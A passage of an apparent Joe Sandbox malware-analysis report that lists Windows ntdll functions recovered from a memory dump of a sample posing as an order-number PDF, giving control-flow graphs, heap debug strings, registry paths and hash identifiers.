                                              • Opcode Fuzzy Hash: 05227b08d0cbaee0d7978bc42b3a159b6ce1293f493d588d407623f1efc16341
                                              • Instruction Fuzzy Hash: 1190026130244443850571585814616405A47E0212B59D022E5015550DC52589956525
                                              Function 335A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2 335a2df0-335a2dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 01d1d1febba8512f4172883fb2f2abe162a26b3e36669463897334d3ba074d91
                                              • Instruction ID: a4873adbbdc365f30b643f47dd3063ad9e3cdf9701a06724cbb53326d4cca643
                                              • Opcode Fuzzy Hash: 01d1d1febba8512f4172883fb2f2abe162a26b3e36669463897334d3ba074d91
                                              • Instruction Fuzzy Hash: BF90023130144853D51171585904707005947D0252F99D413A4425518D96568A56A521
                                              Function 335A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 335a2c70-335a2c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ddb98e1962824f8d35c402870e4e9d19467116cc21e63a5bffddb51c0d1a18e7
                                              • Instruction ID: d05ce4af98d4d1bca455bf0bd4a8f9d51ec7576ec0e0fff43483b59b8e1cf17a
                                              • Opcode Fuzzy Hash: ddb98e1962824f8d35c402870e4e9d19467116cc21e63a5bffddb51c0d1a18e7
                                              • Instruction Fuzzy Hash: 179002313014CC42D5107158980474A005547D0312F5DD412A8425618D869589957521

                                              Non-executed Functions

                                              Function 336094E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 555 336094e0-33609529 556 33609578-33609587 555->556 557 3360952b-33609530 555->557 558 33609534-3360953a 556->558 559 33609589-3360958e 556->559 557->558 561 33609540-33609564 call 335a9020 558->561 562 33609695-336096bd call 335a9020 558->562 560 33609d13-33609d27 call 335a4c30 559->560 571 33609593-33609634 GetPEB call 3360dc65 561->571 572 33609566-33609573 call 3362972b 561->572 569 336096dc-33609712 562->569 570 336096bf-336096da call 33609d2a 562->570 575 33609714-33609716 569->575 570->575 581 33609652-33609667 571->581 582 33609636-33609644 571->582 583 3360967d-33609690 RtlDebugPrintTimes 572->583 575->560 579 3360971c-33609731 RtlDebugPrintTimes 575->579 579->560 589 33609737-3360973e 579->589 581->583 585 33609669-3360966e 581->585 582->581 584 33609646-3360964b 582->584 583->560 584->581 587 33609670 585->587 588 33609673-33609676 585->588 587->588 588->583 589->560 591 33609744-3360975f 589->591 592 33609763-33609774 call 3360a808 591->592 595 33609d11 592->595 596 3360977a-3360977c 592->596 595->560 596->560 597 33609782-33609789 596->597 598 336098fc-33609902 597->598 599 3360978f-33609794 597->599 602 33609908-33609937 call 335a9020 598->602 603 33609a9c-33609aa2 598->603 600 33609796-3360979c 599->600 601 336097bc 599->601 600->601 604 3360979e-336097b2 600->604 605 336097c0-33609811 call 335a9020 RtlDebugPrintTimes 601->605 620 33609970-33609985 602->620 621 33609939-33609944 602->621 607 33609af4-33609af9 603->607 608 33609aa4-33609aad 603->608 611 336097b4-336097b6 604->611 612 336097b8-336097ba 604->612 605->560 647 33609817-3360981b 605->647 609 33609ba8-33609bb1 607->609 610 33609aff-33609b07 607->610 608->592 615 33609ab3-33609aef call 335a9020 608->615 609->592 619 33609bb7-33609bba 609->619 616 33609b13-33609b3d call 33608513 610->616 617 33609b09-33609b0d 610->617 611->605 612->605 640 33609ce9 615->640 644 33609b43-33609b9e call 335a9020 RtlDebugPrintTimes 616->644 645 33609d08-33609d0c 616->645 617->609 617->616 626 33609bc0-33609c0a 619->626 627 33609c7d-33609cb4 call 335a9020 619->627 623 33609991-33609998 620->623 624 33609987-33609989 620->624 628 33609946-3360994d 621->628 629 3360994f-3360996e 621->629 633 336099bd-336099bf 623->633 631 3360998b-3360998d 624->631 632 3360998f 624->632 637 33609c11-33609c1e 626->637 638 33609c0c 626->638 657 33609cb6 627->657 658 33609cbb-33609cc2 627->658 628->629 639 336099d9-336099f6 RtlDebugPrintTimes 629->639 631->623 632->623 648 336099c1-336099d7 633->648 649 3360999a-336099a4 633->649 641 33609c20-33609c23 637->641 642 33609c2a-33609c2d 637->642 638->637 639->560 661 336099fc-33609a1f call 335a9020 639->661 643 33609ced 640->643 641->642 652 33609c39-33609c7b 642->652 653 33609c2f-33609c32 642->653 651 33609cf1-33609d06 RtlDebugPrintTimes 643->651 644->560 687 33609ba4 644->687 645->592 659 3360986b-33609880 647->659 660 3360981d-33609825 647->660 648->639 654 336099a6 649->654 655 336099ad 649->655 651->560 651->645 652->651 653->652 654->648 663 336099a8-336099ab 654->663 665 336099af-336099b1 655->665 657->658 666 33609cc4-33609ccb 658->666 667 33609ccd 658->667 662 33609886-33609894 659->662 668 33609852-33609869 660->668 669 33609827-33609850 call 33608513 660->669 684 33609a21-33609a3b 661->684 685 33609a3d-33609a58 661->685 671 33609898-336098ef call 335a9020 RtlDebugPrintTimes 662->671 663->665 673 336099b3-336099b5 665->673 674 336099bb 665->674 675 33609cd1-33609cd7 666->675 667->675 668->662 669->671 671->560 691 336098f5-336098f7 671->691 673->674 680 336099b7-336099b9 673->680 674->633 681 33609cd9-33609cdc 675->681 682 33609cde-33609ce4 675->682 680->633 681->640 682->643 688 33609ce6 682->688 689 33609a5d-33609a8b RtlDebugPrintTimes 684->689 685->689 687->609 688->640 689->560 693 33609a91-33609a97 689->693 691->645 693->619
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554
                                              • Opcode ID: aae40e4b98dcbd05152c07423ec54bd94ce09897afbb73583589d0cbd1c7ee6c
                                              • Instruction ID: 3f681634819297c3aa33855c59031db90da66d94d21acb6f841f949b63f706be
                                              • Opcode Fuzzy Hash: aae40e4b98dcbd05152c07423ec54bd94ce09897afbb73583589d0cbd1c7ee6c
                                              • Instruction Fuzzy Hash: 113202B1A0C3819FE314CF68C985B5BBBE6BB88344F04492DF599872A0D775E948CF52
                                              Function 33610274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1298 33610274-33610296 call 335b7e54 1301 336102b5-336102cd call 335576b2 1298->1301 1302 33610298-336102b0 RtlDebugPrintTimes 1298->1302 1307 336102d3-336102e9 1301->1307 1308 336106f7 1301->1308 1306 33610751-33610760 1302->1306 1310 336102f0-336102f2 1307->1310 1311 336102eb-336102ee 1307->1311 1309 336106fa-3361074e call 33610766 1308->1309 1309->1306 1313 336102f3-3361030a 1310->1313 1311->1313 1315 336106b1-336106ba GetPEB 1313->1315 1316 33610310-33610313 1313->1316 1319 336106d9-336106de call 3355b970 1315->1319 1320 336106bc-336106d7 GetPEB call 3355b970 1315->1320 1316->1315 1317 33610319-33610322 1316->1317 1321 33610324-3361033b call 3356ffb0 1317->1321 1322 3361033e-33610351 call 33610cb5 1317->1322 1328 336106e3-336106f4 call 3355b970 1319->1328 1320->1328 1321->1322 1333 33610353-3361035a 1322->1333 1334 3361035c-33610370 call 3355758f 1322->1334 1328->1308 1333->1334 1337 336105a2-336105a7 1334->1337 1338 33610376-33610382 GetPEB 1334->1338 1337->1309 1341 336105ad-336105b9 GetPEB 1337->1341 1339 336103f0-336103fb 1338->1339 1340 33610384-33610387 1338->1340 1342 33610401-33610408 1339->1342 1343 336104e8-336104fa call 335727f0 1339->1343 1344 336103a6-336103ab call 3355b970 1340->1344 1345 33610389-336103a4 GetPEB call 3355b970 1340->1345 1346 33610627-33610632 1341->1346 1347 336105bb-336105be 1341->1347 1342->1343 1352 3361040e-33610417 1342->1352 1366 33610590-3361059d call 336111a4 call 33610cb5 1343->1366 1367 33610500-33610507 1343->1367 1356 336103b0-336103d1 call 3355b970 GetPEB 1344->1356 1345->1356 1346->1309 1353 33610638-33610643 1346->1353 1348 336105c0-336105db GetPEB call 3355b970 1347->1348 1349 336105dd-336105e2 call 3355b970 1347->1349 1365 336105e7-336105fb call 3355b970 1348->1365 1349->1365 1359 33610419-33610429 1352->1359 1360 33610438-3361043c 1352->1360 1353->1309 1361 33610649-33610654 1353->1361 1356->1343 1386 336103d7-336103eb 1356->1386 1359->1360 1368 3361042b-33610435 call 3361dac6 1359->1368 1370 3361044e-33610454 1360->1370 1371 3361043e-3361044c call 33593bc9 1360->1371 1361->1309 1369 3361065a-33610663 GetPEB 1361->1369 1397 336105fe-33610608 GetPEB 1365->1397 1366->1337 1375 33610512-3361051a 1367->1375 1376 33610509-33610510 1367->1376 1368->1360 1379 33610682-33610687 call 3355b970 1369->1379 1380 33610665-33610680 GetPEB call 3355b970 1369->1380 1372 33610457-33610460 1370->1372 1371->1372 1384 33610472-33610475 1372->1384 1385 33610462-33610470 1372->1385 1388 33610538-3361053c 1375->1388 1389 3361051c-3361052c 1375->1389 1376->1375 1394 3361068c-336106ac call 336086ba call 3355b970 1379->1394 1380->1394 1395 336104e5 1384->1395 1396 33610477-3361047e 1384->1396 1385->1384 1386->1343 1400 3361056c-33610572 1388->1400 1401 3361053e-33610551 call 33593bc9 1388->1401 1389->1388 1398 3361052e-33610533 call 3361dac6 1389->1398 1394->1397 1395->1343 1396->1395 1403 33610480-3361048b 1396->1403 1397->1309 1405 3361060e-33610622 1397->1405 1398->1388 1404 33610575-3361057c 1400->1404 1412 33610563 1401->1412 1413 33610553-33610561 call 3358fe99 1401->1413 1403->1395 1410 3361048d-33610496 GetPEB 1403->1410 1404->1366 1411 3361057e-3361058e 1404->1411 1405->1309 1415 336104b5-336104ba call 3355b970 1410->1415 1416 33610498-336104b3 GetPEB call 3355b970 1410->1416 1411->1366 1418 33610566-3361056a 1412->1418 1413->1418 1424 336104bf-336104dd call 336086ba call 3355b970 1415->1424 1416->1424 1418->1404 1424->1395
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              • Opcode ID: b7447ae7b8f603114af55a7f993fee13e93af88ec1afb82e65f0492ea67466ad
                                              • Instruction ID: 084d8356c77450e4ed66c4f8e8db07fbabbda0fedb59ec0dde1e2953b708b3c2
                                              • Opcode Fuzzy Hash: b7447ae7b8f603114af55a7f993fee13e93af88ec1afb82e65f0492ea67466ad
                                              • Instruction Fuzzy Hash: 31D1F075D00B85EFEF02CF66D540AADBBF1FF4A310F48805AE4459B612C738A8A1CB51
                                              Function 3355D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/X3$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-4130910089
                                              • Opcode ID: af0d642b4fb6c69422e5cebfc517c0f8463de5ef7437892dea591ea4ae63cc63
                                              • Instruction ID: 27d637b1d9e4941094c045a56484f21665da8e1156e77329b9cdea6a01f11c83
                                              • Opcode Fuzzy Hash: af0d642b4fb6c69422e5cebfc517c0f8463de5ef7437892dea591ea4ae63cc63
                                              • Instruction Fuzzy Hash: 14B1BEB29093459FE711CF24E440A5FBBF8AF88794F45492EF889D7200D770E949CB92
                                              Function 3360F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                              • API String ID: 3446177414-1745908468
                                              • Opcode ID: df2ff7da65ff48e81e6e1ade3c1c02d85bca6927ee75a0c24a2e71f6b07f3333
                                              • Instruction ID: 695868bb464009038ad39e87ca49da2aa4f05396443ebf78d92a5eb63308be3e
                                              • Opcode Fuzzy Hash: df2ff7da65ff48e81e6e1ade3c1c02d85bca6927ee75a0c24a2e71f6b07f3333
                                              • Instruction Fuzzy Hash: DA915235908344DFEB0ACFA8D481A9DBBF5FF4A310F48815AE445AF662CB31A850CF11
                                              Function 336112ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 1c1c4325ba16c056ee16eb3cba33148028f55e9faaa8741e2d5859c7364f8311
                                              • Instruction ID: 3c9e9d24bce7b6dbbb20416d7b5a581b5dddd2724dd37c77d4289d5c7e09236f
                                              • Opcode Fuzzy Hash: 1c1c4325ba16c056ee16eb3cba33148028f55e9faaa8741e2d5859c7364f8311
                                              • Instruction Fuzzy Hash: 5A12DD74A04746DFE716CF28C544BAABBF5EF09354F48845AE4C68BA42D734E8A0CB91
                                              Function 3355D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • @, xrefs: 3355D0FD
                                              • H/X3, xrefs: 335BA843
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3355D146
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3355D262
                                              • @, xrefs: 3355D313
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3355D2C3
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3355D0CF
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3355D196
                                              • @, xrefs: 3355D2AF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/X3$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1132181190
                                              • Opcode ID: d84853399fea0f792b0ad93e9189ce3a46e9e0af809ac47ddfdec0c198dc8d23
                                              • Instruction ID: 06dc2825e5fffd2b62e18b8ce69f6d1f62caf05e327cffede3bd69d9e25f56f1
                                              • Opcode Fuzzy Hash: d84853399fea0f792b0ad93e9189ce3a46e9e0af809ac47ddfdec0c198dc8d23
                                              • Instruction Fuzzy Hash: 85A159B29083459FE711CF24E480B5FBBF8BB84765F40492EF99997240E774E948CB92
                                              Function 33571070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              • Opcode ID: c92c0ba6b1850fe6b7a40d79e21ac8298c0a768d522c5404882a1926189d1574
                                              • Instruction ID: d676ef344de65c5be968b2053ccc74ede70204c2e13158b197e692f2dc32e937
                                              • Opcode Fuzzy Hash: c92c0ba6b1850fe6b7a40d79e21ac8298c0a768d522c5404882a1926189d1574
                                              • Instruction Fuzzy Hash: 85925875E00369CFEB20CF69D840B99B7B6BF44354F1585EAE949AB280DB349E80CF51
                                              Function 3358D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3358D959
                                                • Part of subcall function 33564859: RtlDebugPrintTimes.NTDLL ref: 335648F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              • Opcode ID: 6103f82098677891a053f28550c0ad2e7c0cb8d7b4011e6c708f3bb841019f6f
                                              • Instruction ID: 5562479c357f7fa1409f8c1c2a51e234b548a2a43fbb4b5c8b55a973113ce02f
                                              • Opcode Fuzzy Hash: 6103f82098677891a053f28550c0ad2e7c0cb8d7b4011e6c708f3bb841019f6f
                                              • Instruction Fuzzy Hash: 1B51EF76E00349EFEB04DFA4E48479DBBF1BF88314F584569D801AB695C770A882CF90
                                              Function 3358DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              • Opcode ID: b4822c6a7dc152db09b98f585b1bd83d472776f51572aaaedf96921bac79b7f1
                                              • Instruction ID: eb2c4cda65a4e9de87b4cb0dda4e70b36975ccd66f2d3dba869c71a077f69f5f
                                              • Opcode Fuzzy Hash: b4822c6a7dc152db09b98f585b1bd83d472776f51572aaaedf96921bac79b7f1
                                              • Instruction Fuzzy Hash: 7A413775A01784DFE302CF68E484B5AB7F4EF45368F148669E4519BB91CB74A8C0CF91
                                              Function 3358DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              • Opcode ID: 1d7ac92ec09ba6e49b9c122ec435ab4fd0e6e9987faea3797c21a5aa5e370a00
                                              • Instruction ID: 1a1bcebc6cf011af0ee3afd14afd19104af8663b9619d5f7945854a7f1577465
                                              • Opcode Fuzzy Hash: 1d7ac92ec09ba6e49b9c122ec435ab4fd0e6e9987faea3797c21a5aa5e370a00
                                              • Instruction Fuzzy Hash: 9C314B356057C4EFF312DB68E408B4977F8EF02764F044595F4529BA52CBB8A880CF51
                                              Function 335F9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 98f97117b182a9f62cc693d35ab919584f149cfeeacb05c790cab1483efa3e03
                                              • Instruction ID: fa06a025e90254236cb5f87558e094e53f118c2ae834c5d644f8891cdd9f9f5e
                                              • Opcode Fuzzy Hash: 98f97117b182a9f62cc693d35ab919584f149cfeeacb05c790cab1483efa3e03
                                              • Instruction Fuzzy Hash: AFD1F1B2C05B55EFE321CA54E840B6FB7F8AFC4754F850A29F994A7150E772C9088BD2
                                              Function 3355F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: e9dc84bc96afb8405bccf4cf7c92120df7e10ccc90a22e5164c35d6509d54ffb
                                              • Instruction ID: 216a709dd361af50fac35481d5cf06ab6b4ff4ad948bd16663378f1f560e24ff
                                              • Opcode Fuzzy Hash: e9dc84bc96afb8405bccf4cf7c92120df7e10ccc90a22e5164c35d6509d54ffb
                                              • Instruction Fuzzy Hash: 4142DD75608781DFE705CF28E884A1ABBF5FF88344F584A6AF486CB651DB34E841CB52
                                              Function 335851EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
